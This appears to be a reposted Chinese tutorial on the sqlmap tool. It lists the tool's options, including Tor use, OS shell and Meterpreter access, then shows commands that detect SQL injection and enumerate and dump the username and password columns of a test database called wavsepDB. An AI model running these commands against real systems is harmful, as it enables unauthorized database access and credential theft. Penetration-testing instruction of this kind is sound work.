一、sqlmap選項
目標:至少要選中一個引數
-u URL, --url=URL 目標為 URL (例如. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK 將谷歌dork的結果作為目標url
請求:
這些選項可用于指定如何連接到目標URL
--data=https://www.cnblogs.com/donghao0924/p/DATA 資料字串通過POST發送
--cookie=COOKIE HTTP Cookie的值
--random-agent 隨機選擇 HTTP User-Agent 頭的值
--proxy=PROXY 使用代理去連接目標URL
--tor 使用匿名網路
--check-tor 檢查Tor是否正確使用
注入:
這些選項可用于指定要測驗哪些引數,提供自定義注入負載和可選篡改腳本
-p TESTPARAMETER 可測驗的引數
--dbms=DBMS 將后端DBMS強制到此值
檢測:
這些選項可用于定制檢測階段
--level=LEVEL 執行的測驗級別(1-5, 默認 1)
--risk=RISK 執行測驗的風險 (1-3, 默認 1)
技術:
這些選項可用于調整特定SQL注入的測驗的技術
--technique=TECH SQL注入技術選擇 (默認 "BEUSTQ")
列舉:
T這些選項可用于列舉后端資料庫管理系統的資訊、結構和資料表,此外,還可以運行自己的SQL陳述句
-a, --all 檢索全部
-b, --banner 檢索 banner
--current-user 檢索當前用戶
--current-db 檢索當前資料庫
--passwords 列出用戶密碼的hash值
--tables 列出表
--columns 列出欄位
--schema 列出DBMS schema
--dump Dump DBMS資料庫表的條目
--dump-all Dump 所有DBMS資料庫表的條目
-D DB 指定資料庫
-T TBL 指定表
-C COL 指定欄位
作業系統訪問:
這些選項可用于訪問后端資料庫管理系統底層作業系統
--os-shell 提示為互動式作業系統shell
--os-pwn 提示為OOB外殼,Meterpreter或VNC
通用:
這些選項可用于設定一些通用的作業引數
--batch 永遠不要要求用戶輸入,使用默認行為
--flush-session 重繪當前目標的會話檔案
雜項:
--sqlmap-shell 提示輸入互動式sqlmap shell
--wizard 初學者的簡單向導界面
二、sqlmap使用
1.對url進行檢測,判斷是否存在SQL注入
python sqlmap.py -u "url" --batch
跑完以后發現存在注入,,引數是username 注入型別為盲注,資料庫是mysql,后端語言是jsp
2.獲取資料庫
python sqlmap.py -u URL --dbs --batch 獲取全部資料庫
python sqlmap.py -u URL --current-db --batch 獲取當前資料庫
獲取到了當前的資料庫為 wavsepDB
3.獲取當前資料庫里所有表
python sqlmap.py -u URL -D wavsepDB --tables --batch
4.獲取表的欄位
python sqlmap.py -u URL -D wavsepDB -T users --columns --batch
如圖獲取到上面欄位以后,我們就開始dump欄位內容了,
5.dump欄位內容
python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch
如果欄位內容多的話可以再加上如 --start 1 --stop 100 這樣就取1-100條資料
--dump 可以換成 --dump-all則匯出全部的內容
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/65175.html
標籤:其他